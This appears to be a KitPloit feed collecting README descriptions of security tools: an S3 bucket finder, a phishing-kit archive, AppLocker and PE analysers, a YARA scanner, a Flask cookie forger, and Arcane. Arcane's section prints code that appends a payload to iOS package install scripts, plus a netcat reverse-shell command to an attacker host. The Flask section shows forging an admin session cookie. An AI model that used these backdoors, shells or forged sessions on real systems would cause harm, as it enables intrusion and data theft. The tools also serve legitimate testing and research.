Channel: KitPloit - PenTest Tools!

FestIn - S3 Bucket Weakness Discovery


FestIn is a tool for discovering open S3 buckets, starting from a domain.
It performs many tests and collects information from:
  • DNS
  • Web Pages (Crawler)
  • The S3 buckets themselves (e.g. S3 redirections)

Why FestIn
There are many tools for enumerating and discovering S3 buckets. Some of them are great, but none has the complete feature set that FestIn offers.
Main features that make FestIn great:
  • Various techniques for finding buckets: crawling, DNS crawling and S3 response analysis.
  • Proxy support for tunneling requests.
  • AWS credentials are not needed.
  • Works with any S3-compatible provider, not only AWS.
  • Allows configuring custom DNS servers.
  • Integrated high-performance HTTP crawler.
  • Recursive search and feedback between the three engines: a domain found by the DNS crawler is sent to the S3 and HTTP crawler analyzers, and likewise for domains found by the S3 and crawler engines.
  • 'Watching' mode, listening for new domains in real time.
  • Saves all discovered domains in a separate file for further analysis.
  • Can download bucket objects and feed them into a full-text search engine (Redis Search) automatically, indexing their content to allow powerful searches later.
  • Limits the search to specific domain(s).

Install

Using Python
Python 3.8 or above is needed!
$ pip install festin
$ festin -h

Using Docker
$ docker run --rm -it cr0hn/festin -h

Full options
$ festin -h
usage: __main__.py [-h] [--version] [-f FILE_DOMAINS] [-w] [-c CONCURRENCY] [--no-links] [-T HTTP_TIMEOUT] [-M HTTP_MAX_RECURSION] [-dr DOMAIN_REGEX] [-rr RESULT_FILE] [-rd DISCOVERED_DOMAINS] [-ra RAW_DISCOVERED_DOMAINS]
[--tor] [--debug] [--no-print] [-q] [--index] [--index-server INDEX_SERVER] [-dn] [-ds DNS_RESOLVER]
[domains [domains ...]]

Festin - the powered S3 bucket finder and content discover

positional arguments:
domains

optional arguments:
-h, --help show this help message and exit
--version show version
-f FILE_DOMAINS, --file-domains FILE_DOMAINS
file with domains
-w, --watch watch for new domains in file domains '-f' option
-c CONCURRENCY, --concurrency CONCURRENCY
max concurrency

HTTP Probes:
--no-links extract web site links
-T HTTP_TIMEOUT, --http-timeout HTTP_TIMEOUT
set timeout for http connections
-M HTTP_MAX_RECURSION, --http-max-recursion HTTP_MAX_RECURSION
maximum recursion when following links
-dr DOMAIN_REGEX, --domain-regex DOMAIN_REGEX
only follow domains that matches this regex

Results:
-rr RESULT_FILE, --result-file RESULT_FILE
results file
-rd DISCOVERED_DOMAINS, --discovered-domains DISCOVERED_DOMAINS
file name for storing new discovered after apply filters
-ra RAW_DISCOVERED_DOMAINS, --raw-discovered-domains RAW_DISCOVERED_DOMAINS
file name for storing any domain without filters

Connectivity:
--tor Use Tor as proxy

Display options:
--debug enable debug mode
--no-print doesn't print results on screen
-q, --quiet Use quiet mode

Redis Search:
--index Download and index documents into Redis
--index-server INDEX_SERVER
Redis Search server. Default: redis://localhost:6379

DNS options:
-dn, --no-dnsdiscover
not follow dns cnames
-ds DNS_RESOLVER, --dns-resolver DNS_RESOLVER
comma separated custom domain name servers

Usage

Configure search domains
By default FestIn accepts a start domain as command line parameter:
> festin mydomain.com
But you can also set up an external file with a list of domains:
> cat domains.txt
domain1.com
domain2.com
domain3.com
> festin -f domains.txt

Concurrency
FestIn performs many tests for each domain, and the tests run concurrently. By default concurrency is set to 5. If you want to increase the number of concurrent tests, set the -c option:
> festin -c 10 mydomain.com 
Be careful with the concurrency level, or alarms could be raised on some websites.

HTTP Crawling configuration
FestIn embeds a small crawler to discover links to S3 buckets. The crawler accepts these options:
  • Timeout (-T or --http-timeout): configures a timeout for HTTP connections. If the website of the domain you want to analyze is slow, we recommend increasing this value. The default timeout is 5 seconds.
  • Maximum recursion (-M or --http-max-recursion): this value sets a limit on crawling recursion; otherwise FestIn would scan the whole internet. The default is 3, which means it will only follow: domain1.com -> [link] -> domain2.com -> [link] -> domain3.com -> [link] -> maximum recursion reached, stop.
  • Limit domains (-dr or --domain-regex): set this option to limit the crawler to domains that match this regex.
Example:
> festin -T 20 -M 8 -dr *mydomain* mydomain.com 

Manage results
When FestIn runs it discovers a lot of useful information, not only about S3 buckets but also from the other probes it performs.
After running FestIn we can use the discovered information (domains, links, resources, other buckets...) as input for other tools, such as nmap.
For this reason FestIn has three different modes for storing discovered information, and they can be combined:
  • FestIn result file (-rr or --result-file): this file contains one JSON object per line for each bucket found. Each JSON object includes the origin domain, the bucket name and the list of objects in the bucket (see the parsing sketch after the examples below).
  • Filtered discovered domains file (-rd or --discovered-domains): this file contains one domain per line. These domains are discovered by the crawler, DNS or S3 probes, but only those matching the user and internal filters are stored.
  • Raw discovered domains file (-ra or --raw-discovered-domains): this file contains all domains discovered by FestIn, one per line, without any filter. This option is useful for post-processing and analysis.
Example:
> festin -rr festin.results -rd discovered-domains.txt -ra raw-domains.txt mydomain.com 
And, chaining with Nmap:
> festin -rd domains.txt && nmap -Pn -A -iL domains.txt -oN nmap-domains.txt 
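Because the result file contains one JSON object per line, it is easy to post-process. A minimal Python sketch (the key names used below are assumptions for illustration; inspect one line of your own result file to confirm them):
import json

# Iterate over FestIn's JSON-lines result file and print a short summary per bucket.
# The keys "domain", "bucket_name" and "objects" are assumed names, not documented here.
with open("festin.results") as fh:
    for line in fh:
        result = json.loads(line)
        print(result.get("domain"), result.get("bucket_name"), len(result.get("objects", [])))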

Proxy usage
FestIn provides the --tor option. To use this parameter you need a local Tor proxy running on 127.0.0.1, port 9050.
> tor &
> festin --tor mydomain.com

DNS Options
Some tests made by FestIn involve DNS. It supports these options:
  • Disable DNS discovery (-dn or --no-dnsdiscover)
  • Custom DNS server (-ds or --dns-resolver): sets a custom DNS server. If you plan to perform a lot of tests you should use a DNS server different from the one your browser uses.
Example:
> festin -ds 8.8.8.8 mydomain.com 

Full Text Support
FestIn can not only discover open S3 buckets, it can also download all their content and store it in a full-text search engine. This means you can run full-text queries against the bucket content!
FestIn uses the open source project Redis Search as its full-text engine.
This feature has two options:
  • Enable indexing (--index): set this flag to enable indexing into the search engine.
  • Redis Search config (--index-server): you only need to set this option if your server is running on an IP/port other than localhost:6379.
Example:
> docker run --rm -p 6700:6379 redislabs/redisearch:latest -d
> festin --index --index-server redis://127.0.0.1:6700 mydomain.com
Note that the `--index-server` value must have the redis:// prefix.
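Once documents have been indexed, queries can be run directly against the RediSearch server. A minimal sketch with redis-py (the index name below is a placeholder for illustration; FestIn's actual index name is not documented here):
import redis

# Connect to the RediSearch server FestIn indexed into (adjust host/port as needed).
r = redis.Redis(host="127.0.0.1", port=6700)

# "bucket_objects" is a hypothetical index name used only for illustration.
results = r.execute_command("FT.SEARCH", "bucket_objects", "password", "LIMIT", "0", "10")
print(results)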

Running as a service (or watching mode)
Sometimes we don't want to stop and relaunch FestIn every time we have a new domain to inspect, or whenever an external tool discovers new domains we want to check.
FestIn supports a watching mode. This means that FestIn starts and listens for new domains. The way to "send" new domains to FestIn is through the domains file: FestIn monitors this file for changes.
This feature is useful for combining FestIn with other tools, like dnsrecon.
Example:
> festin --watch -f domains.txt 
In a different terminal we can write:
> echo "my-second-domain.com" >> domains.txt 
> echo "another-domain.com" >> domains.txt
Each new domain added to domains.txt will wake up FestIn.

Example: Mixing FesTin + DnsRecon
Using DnsRecon
The domain chosen for this example is target.com.

Step 1 - Run dnsrecon with desired options against target domain and save the output
>  dnsrecon -d target.com -t crt -c target.com.csv
With this command we are going to find out other domains related to target.com. This will help to maximize our chances of success.

Step 2 - Prepare the previous generated file to feed FestIn
> tail -n +2 target.com.csv | sort -u | cut -d "," -f 2 >> target.com.domains
With this command we generate a file with one domain per line. This is the input that FestIn needs.

Step 3 - Run FestIn with desired options and save output
>  festin -f target.com.domains -c 5 -rr target.com.result.json --tor -ds 212.166.64.1 >target.com.stdout 2>target.com.stderr
In this example the resulting files are:
  • target.com.result.json - Main result file with one line per bucket found. Each line is a JSON object.
  • target.com.stdout - The standard output of festin command execution
  • target.com.stderr - The standard error of festin command execution
To ease the processing of multiple domains, we provide a simple script, examples/loop.sh, that automates this.
Using FestIn with DnsRecon results
Run against target.com with default options, saving results to the target.com.result.json file:
> festin target.com -rr target.com.result.json 

Run against target.com using the Tor proxy, with a concurrency of 5, using DNS 212.166.64.1 for resolving CNAMEs, and saving results to the target.com.result.json file:
> festin target.com -c 5 -rr target.com.result.json --tor -ds 212.166.64.1 

F.A.Q.
Q: AWS bans my IP.
A: When you perform a lot of tests against AWS S3, AWS adds your IP to a blacklist. From then on, every attempt to access any S3 bucket, whether with FestIn or with your browser, will be blocked.
We recommend setting up a proxy when you use FestIn.

Who uses FestIn

MrLooquer
They analyze and assess your company's risk exposure in real time.



PhishingKitTracker - Let's Track Phishing Kits To Give The Research Community Raw Material To Study

$
0
0

An extensible and freshly updated collection of phishing kits for forensics and future analysis, topped with simple stats.

Disclaimer
This repository holds a collection of phishing kits used by criminals to steal user information. Almost every file in the raw folder is malicious, so I strongly recommend that you neither open these files nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.
I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

NB: Large File System Ahead
PhishingKitTracker is stored in Git Large File Storage (git-lfs) due to the large amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data
The raw folder tracks the phishing kits in their original format; no manipulation is involved in that data. A backend script goes over harvested malicious websites (collected from common sources) and checks whether phishing kits are present. If a phishing kit is found, the resulting file is downloaded and instantly added to that folder. This folder is tracked using Git Large File Storage since many files are bigger than 100MB. The raw data is quite unexplored territory; you will very likely find many interesting topics in it. Please remember to cite this work if you find something here, it would be very much appreciated.

STATS
The stats folder maintains two up-to-date files:
  1. files_name holds the frequency of the file names associated with kits. In other words, every phishing kit is saved on the phishing host with a name, and files_name keeps track of every file name and its frequency. If you are wondering why I am not tracking hashes, it is because phishing kits are big compressed archives, so it would make no sense at this stage since they always differ from each other (but check the src folder for additional information).
  2. sites holds the frequency of the hosting domain names, in other words where the phishing kits were found. No duplicates are tracked, meaning the frequency and the file names are unique. For example, if you see something like 3 li.humanbiomics-project.org, it means that three different phishing kits have been found on li.humanbiomics-project.org over time. Both of these files are generated by simple bash scripts like:
  • ls raw/ | cut -d'_' -f1 | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | uniq -c | sort -bgr > stats/files_name.txt
These scripts run on every commit, keeping the stats files in line with the raw folder.
In addition, a file called similarity.csv is provided, with a significant delay due to the vast amount of time needed to generate it. That file gives the similarity between the tracked phishing kits. It is a simple CSV file, so you can import it into your favorite spreadsheet and build graphs, statistics, or manipulate it however you prefer.

SIMILARITY.CSV structure
The similarity structure is the following: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:
  • FileA is the phishing kit considered in the analysis.
  • FileB is the phishing kit compared against FileA.
  • SimilarityAVG is the average similarity, calculated by running the similarity check between every (interesting) file in the FileA archive and every (interesting) file in the FileB archive.
  • SimilarityMin is the lowest similarity value found between FileA and FileB.
  • SimilarityMax is the highest similarity value found between FileA and FileB.
If you want to generate similarity.csv on your own, I provide a simple and dirty script in the src folder. So far it has several limitations (for example, it only processes ZIP files); please make pull requests to improve and empower it. Every contribution is very helpful.
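As a post-processing example, the CSV can be loaded and sorted to surface the most similar kit pairs. A minimal Python sketch (it assumes the column order described above and tolerates an optional header row):
import csv

# Load similarity.csv (FileA, FileB, SimilarityAVG, SimilarityMin, SimilarityMax)
# and print the 10 most similar phishing kit pairs by average similarity.
rows = []
with open("similarity.csv", newline="") as fh:
    for row in csv.reader(fh):
        try:
            rows.append((row[0], row[1], float(row[2])))
        except (IndexError, ValueError):
            continue  # skip a header line or malformed rows

for file_a, file_b, avg in sorted(rows, key=lambda r: r[2], reverse=True)[:10]:
    print(f"{avg:.2f}  {file_a}  <->  {file_b}")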

SRC
Please check these variables (in compute_similarity.py) and change them as you wish.
EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE = 'similarity.csv'
RAW_FOLDER = '/tmp/raw/'
TEMP_FOLDER = '/tmp/tt'
Once you've changed them you can run the script and take a long rest. It will walk through RAW_FOLDER, grab the .zip files and try to compute code similarity between them. At the very end it will save the results into OUTPUT_FILE. From there you can import that file into your favorite spreadsheet processor and work on the code similarity.
So far the Python script is only able to compare ZIP-tracked phishing kits; support for other compressed formats is still a work in progress.
NB: The Python script is in a super early stage of development. Please help to improve it.

How to contribute
Introduce walking scripts for different compression formats. In other words, if you want to contribute you can write a new section like the following one (from compute_similarity.py) but for different compression extensions such as .tar.gz, .tar, .rar, .7z and so on (see the sketch after the code below).
# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the entire file
# path for future works
# (this excerpt needs: import os / from zipfile import ZipFile)
def extractZipAndReturnsIntereistingFiles(file_to_extract):
    interesting_files = []
    n_interesting_files = []
    try:
        with ZipFile(file_to_extract, 'r') as zipObj:
            listOfFileNames = zipObj.namelist()
            for fileName in listOfFileNames:
                for ext in EXTENSION_FOR_ANALYSIS:
                    if fileName.endswith(ext):
                        try:
                            zipObj.extract(fileName, TEMP_FOLDER)
                            interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
                        except Exception as e:
                            continue
                    else:
                        n_interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
    except Exception as e:
        return interesting_files
    return interesting_files
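For instance, a contributed walker for .tar.gz archives could mirror the ZIP function above. A minimal sketch (it reuses the EXTENSION_FOR_ANALYSIS and TEMP_FOLDER globals and is not part of the current script):
import os
import tarfile

# Hypothetical analogue of the ZIP extractor, for .tar.gz archives.
def extractTarGzAndReturnsInterestingFiles(file_to_extract):
    interesting_files = []
    try:
        with tarfile.open(file_to_extract, 'r:gz') as tarObj:
            for member in tarObj.getmembers():
                if any(member.name.endswith(ext) for ext in EXTENSION_FOR_ANALYSIS):
                    try:
                        tarObj.extract(member, TEMP_FOLDER)
                        interesting_files.append(os.path.join(TEMP_FOLDER, member.name))
                    except Exception:
                        continue
    except Exception:
        return interesting_files
    return interesting_files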
Another way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelize the task by forking and spawning more processes, or by changing the way I use multi-threading in this quick and dirty statistics script. In conclusion, every working pull request is welcome.

Cite The Work
@misc{ MR,
author = "Marco Ramilli",
title = "Phishing Kits Tracker",
year = "2020",
url = "https://marcoramilli.com/2020/07/13/introducing-phishingkittracker/",
note = "[Online; July 2020]"
}

Credits
  • Alen Pavlovic for the amazing image that I borrowed from here
  • agarwalkeshav8399 for code similarity algorithms from here


SharpAppLocker - C# Port Of The Get-AppLockerPolicy PS Cmdlet

$
0
0

C# port of the Get-AppLockerPolicy PS cmdlet




V1.0.0 - by Flangvik & Jean_Maes_1994


Usage:
-h, -?, --help Show Help

-l, --local Queries local applocker config

-d, --domain Queries domain applocker config (needs an ldap
path)

-e, --effective Queries the effective applocker config on this
computer

-x, --xml output applocker in XML format (default is json)

--ldap=VALUE the ldap filter to query the domain policy from

For detailed information please take a look at the MSDN URL: https://docs.microsoft.com/en-us/powershell/module/applocker/get-applockerpolicy?view=win10-ps


Evine - Interactive CLI Web Crawler

$
0
0

Evine is a simple, fast, and interactive web crawler and web scraper written in Golang. Evine is useful for a wide range of purposes such as metadata and data extraction, data mining, reconnaissance and testing.


Follow the project on Twitter.

Install

From Binary
Pre-built binary releases are also available.

From source
go get github.com/saeeddhqan/evine
"$GOPATH/bin/evine" -h

From GitHub
git clone https://github.com/saeeddhqan/evine.git
cd evine
go build .
mv evine /usr/local/bin
evine --help
Note: golang 1.13.x required.

Commands & Usage
Keybinding    Description
Enter         Run crawler (from URL view)
Enter         Display response (from Keys and Regex views)
Tab           Next view
Ctrl+Space    Run crawler
Ctrl+S        Save response
Ctrl+Z        Quit
Ctrl+R        Restore to default values (from Options and Headers views)
Ctrl+Q        Close response save view (from Save view)
evine -h
It displays help for the tool:
flag                     Description                                                                  Example
-url                     URL to crawl for                                                             evine -url toscrape.com
-url-exclude string      Exclude URLs matching this regex (default ".*")                              evine -url-exclude ?id=
-domain-exclude string   Exclude in-scope domains to crawl; separate with comma (default: root domain)   evine -domain-exclude host1.tld,host2.tld
-code-exclude string     Exclude HTTP status codes; separate with '|' (default ".*")                  evine -code-exclude 200,201
-delay int               Sleep between each request (milliseconds)                                    evine -delay 300
-depth                   Scraper depth search level (default 1)                                       evine -depth 2
-thread int              Number of concurrent goroutines for resolving (default 5)                    evine -thread 10
-header                  HTTP header for each request (separate fields with \n)                       evine -header KEY: VALUE\nKEY1: VALUE1
-proxy string            Proxy as scheme://ip:port                                                    evine -proxy http://1.1.1.1:8080
-scheme string           Set the scheme for the requests (default "https")                            evine -scheme http
-timeout int             Seconds to wait before timing out (default 10)                               evine -timeout 15
-keys string             What to extract (email, url, query_urls, all_urls, phone, media, css, script, cdn, comment, dns, network, all, or a file extension)   evine -keys urls,pdf,txt
-regex string            Search the regular expression on the page contents                           evine -regex 'User.+'
-max-regex int           Max results of the regex search (default 1000)                               evine -max-regex -1
-robots                  Scrape robots.txt for URLs and use them as seeds                             evine -robots
-sitemap                 Scrape sitemap.xml for URLs and use them as seeds                            evine -sitemap

VIEWS
  • URL: In this view, you should enter the URL string.
  • Options: This view is for setting options.
  • Headers: This view is for setting the HTTP Headers.
  • Keys: This view is used after the crawl has run. It extracts data (docs, URLs, etc.) from the web pages that have been crawled.
  • Regex: This view is used to search regexes in the web pages that have been crawled. Write your regex in this view and press Enter.
  • Response: All of the results are written in this view.
  • Search: This view is used to search with regexes in the Response content.

TODO
  • Archive crawler as seeds
  • JSON output

Bugs or Suggestions
Bugs or suggestions? Create an issue.
evine is heavily inspired by wuzz.


IRFuzz - Simple Scanner with Yara Rule

$
0
0

IRFuzz is a simple scanner with yara rules for document archives or any files.

Install

1. Prerequisites
Linux or OS X
  • Yara: just use the latest release source code, compile and install it (or install it via pip install yara-python)
  • Yara Rules - You may download yara rules from here or import your own custom ruleset.
  • Python dependencies
Dependencies are managed with pipenv. To get started, install the dependencies and activate the virtual environment with the following commands:
$ pipenv install
$ pipenv shell

Running IRFuzz
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv
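Under the hood the scanner relies on yara-python. As a standalone illustration, matching a single file against a rule file looks roughly like this (both paths are placeholders):
import yara

# Compile one rule file and match it against a single sample (paths are placeholders).
rules = yara.compile(filepath="rules/maldocs/example.yar")
matches = rules.match("/tmp/suspicious.docm")
for match in matches:
    print(match.rule, match.strings)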

Supported Features
  • Scans new files with inotify
  • Polling if inotify is not supported
  • Custom extensions are supported
  • Delete mode will delete matched file
  • Recursive directory scan
  • Lists matched Yara functions with yarastrings with ctime
  • CSV results for Filebeat

Custom extensions
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --extensions .zip,.rar

Alert matching yara rule
Generate token from https://irfuzz.com/tokens
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --extensions .php --token tokenhere
Configure alerts from the website to Telegram or your email.

Delete matched file
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --delete

Polling (inotify not supported)
$ python -m watchd.watch ~/tools/IR/ -y rules/maldocs --csv csvfile.csv --polling
The --polling option forces the use of a polling mechanism to detect changes in the data directory. Polling is slower than the OS's underlying change-detection mechanism, but it is necessary with certain file systems such as SMB mounts.

Default extensions (used when no extensions are specified):

Microsoft Office Word supported file formats
.doc .docm .docx .dot .dotm .dotx .odt

Microsoft Office Excel supported file formats
.ods .xla .xlam .xls .xlsb .xlsm .xlsx .xlt .xltm .xltx .xlw

Microsoft Office PowerPoint supported file formats
.pot .potm .potx .ppa .ppam .pps .ppsm .ppsx .ppt .pptm .pptx

zipdump.py
IRFuzz uses zipdump.py for zip file analysis.


Arcane - A Simple Script Designed To Backdoor iOS Packages (Iphone-Arm) And Create The Necessary Resources For APT Repositories

$
0
0

Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.

How Arcane works...
To understand what's happening in the GIF, decompress a package created with Arcane.
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp
Notice the control and postinst files in the DEBIAN directory. Both files are important.
tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│ ├── control
│ └── postinst
└── usr
└── bin
└── whois
It's possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
# If --file is used, `cat` the command(s) into the postinst file.
if [[ "$infile" ]]; then
cat "$infile" >> "$postinst";
embed="[$infile]";
else
# If no --file, utilize the simple Bash payload, previously
# defined.
echo -e "$payload" >> "$postinst";
embed="generic shell command";
fi;
status "embedded $embed into postinst" "error embedding backdoor" ;
chmod 0755 "$postinst"
};
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
# If no control is detected, create it using the template.
echo "$controlTemp" > "$tmp/DEBIAN/control";
status "created control file" "error with control template";
else
# If a control file exists, Arcane will simply rename the package
# as it appears in the list of available Cydia applications. This
# makes the package easier to locate in Cydia.
msg "detected control file" succ;
sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
status "modified control file" "error with control";
fi;

Usage
Clone the repository in Kali v2020.3.
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help
Embed a command into a given package. See article for more info.
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcat

Package samples
The repo includes packages for testing.
ls -la samples/

-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb
MD5 sums, as found on the official Bingner repository.
md5sum samples/*.deb

3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7 samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb


Flask-Session-Cookie-Manager - Flask Session Cookie Decoder/Encoder

$
0
0

 Flask Session Cookie Decoder/Encoder

Dependencies

Installation

BlackArch Linux
# pacman -S flask-session-cookie-manager{3,2}

Git

ArchLinux
Both python3 and python2:
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
# makepkg -sic

Other distros
Find your way with your package manager, use pip in a virtual environment or use pyenv.
Eg.
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
$ python -m venv venv
$ source venv/bin/activate
$ python setup.py install

Usage
Use flask_session_cookie_manager3.py with Python 3 and flask_session_cookie_manager2.py with Python 2.
usage: flask_session_cookie_manager{2,3}.py [-h] {encode,decode} ...

Flask Session Cookie Decoder/Encoder

positional arguments:
{encode,decode} sub-command help
encode encode
decode decode

optional arguments:
-h, --help show this help message and exit

Encode
usage: flask_session_cookie_manager{2,3}.py encode [-h] -s <string> -t <string>

optional arguments:
-h, --help show this help message and exit
-s <string>, --secret-key <string>
Secret key
-t <string>, --cookie-structure <string>
Session cookie structure

Decode
usage: flask_session_cookie_manager.py decode [-h] [-s <string>] -c <string>

optional arguments:
-h, --help show this help message and exit
-s <string>, --secret-key <string>
Secret key
-c <string>, --cookie-value <string>
Session cookie value

Examples

Encode
$ python{2,3} flask_session_cookie_manager{2,3}.py encode -s '.{y]tR&sp&77RdO~u3@XAh#TalD@Oh~yOF_51H(QV};K|ghT^d' -t '{"number":"326410031505","username":"admin"}'
eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw
Note: the session cookie structure must be a valid python dictionary

Decode
With secret key:
$ python{2,3} flask_session_cookie_manager{2,3}.py decode -c 'eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw' -s '.{y]tR&sp&77RdO~u3@XAh#TalD@Oh~yOF_51H(QV};K|ghT^d'
{u'username': 'admin', u'number': '326410031505'}
Without secret key (less pretty output):
$ python{2,3} flask_session_cookie_manager{2,3}.py decode -c 'eyJudW1iZXIiOnsiIGIiOiJNekkyTkRFd01ETXhOVEExIn0sInVzZXJuYW1lIjp7IiBiIjoiWVdSdGFXND0ifX0.DE2iRA.ig5KSlnmsDH4uhDpmsFRPupB5Vw'
{"number":{" b":"MzI2NDEwMDMxNTA1"},"username":{" b":"YWRtaW4="}}

Original author : Wilson Sumanang
Fixes and improvements author : Alexandre ZANNI
Imported from saruberoz.github.io


PE Tree - Python Module For Viewing Portable Executable (PE) Files In A Tree-View

$
0
0

Python module for viewing Portable Executable (PE) files in a tree-view using pefile and PyQt5. Can also be used with IDA Pro to dump in-memory PE files and reconstruct imports.

Features
  • Standalone application and IDAPython plugin
  • Supports Windows/Linux/Mac
  • Rainbow PE ratio map:
    • High-level overview of PE structures, size and file location
    • Allows for fast visual comparison of PE samples
  • Displays the following PE headers in a tree view:
    • MZ header
    • DOS stub
    • Rich headers
    • NT/File/Optional headers
    • Data directories
    • Sections
    • Imports
    • Exports
    • Debug information
    • Load config
    • TLS
    • Resources
    • Version information
    • Certificates
    • Overlay
  • Extract and save data from:
    • DOS stub
    • Sections
    • Resources
    • Certificates
    • Overlay
  • Send data to CyberChef
  • VirusTotal search of:
    • File hashes
    • PDB path
    • Timestamps
    • Section hash/name
    • Import hash/name
    • Export name
    • Resource hash
    • Certificate serial
  • Standalone application;
    • Double-click VA/RVA to disassemble with capstone
    • Hex-dump data
  • IDAPython plugin:
    • Easy navigation of PE file structures
    • Double-click VA/RVA to view in IDA-view/hex-view
    • Search IDB for in-memory PE files;
      • Reconstruct imports (IAT + IDT)
      • Dump reconstructed PE files
      • Automatically comment PE file structures in IDB
      • Automatically label IAT offsets in IDB

Application

Requirements
  • Python 3+

Installation

Using pip (recommended)
Install directly from GitHub using a fresh virtual environment and pip:

Windows
> virtualenv env
> env\Scripts\activate
> pip install --upgrade pip
> pip install git+https://github.com/blackberry/pe_tree.git

Mac/Linux
$ python3 -m venv env
$ source ./env/bin/activate
$ pip install --upgrade pip
$ pip install git+https://github.com/blackberry/pe_tree.git

For developers
Git clone the repository and setup for development:

Windows
> git clone https://github.com/blackberry/pe_tree.git
> cd pe_tree
> virtualenv env
> env\Scripts\activate
> pip install -e .

Mac/Linux
$ git clone https://github.com/blackberry/pe_tree.git
$ cd pe_tree
$ python3 -m venv env
$ source ./env/bin/activate
$ pip install -e .

Usage
Run PE Tree and use the GUI to select a file to view:
$ pe-tree
Run PE Tree and view the specified file/folder:
$ pe-tree <path>

Dark-mode
Dark-mode can be enabled by installing QDarkStyle:
$ pip install qdarkstyle

IDAPython


Requirements
  • IDA Pro 7.0+ with Python 2.7
  • IDA Pro 7.4+ with Python 2.7 or 3.x

Installation
To install and run as an IDAPython plugin you can either use setuptools or install manually.

Using setuptools
  1. Download pe_tree and install for the global Python interpreter used by IDA:
    $ git clone https://github.com/blackberry/pe_tree.git
    $ cd pe_tree
    $ python setup.py develop --ida
  2. Copy pe_tree_ida.py to your IDA plugins folder

Install manually
  1. Download pe_tree and install requirements for the global Python interpreter used by IDA:
    $ git clone https://github.com/blackberry/pe_tree.git
    $ cd pe_tree
    $ pip install -r requirements.txt
  2. Copy pe_tree_ida.py and the contents of ./pe_tree/ to your IDA plugins folder

For developers
To simply run as a script under IDA first install the pe_tree package requirements for the global Python installation:
$ pip install -r requirements.txt
Then run pe_tree_ida.py under IDA:
File -> Script file... -> pe_tree_ida.py -> Open

IDA plugins folder
OS        Plugins folder
Windows   %ProgramFiles%\IDA Pro 7.X\plugins
Linux     /opt/ida-7.X/plugins
Mac       ~/.idapro/plugins

Usage
  1. Run IDA and disassemble a PE file (select Manual Load and Load Resources for best results!)
  2. Click Edit -> Plugins -> PE Tree

Examples

Dumping in-memory PE files
Below are the basic steps to dump a packed PE file (for example MPRESS or UPX) and rebuild imports (assuming the image base/entry-point is fairly standard):
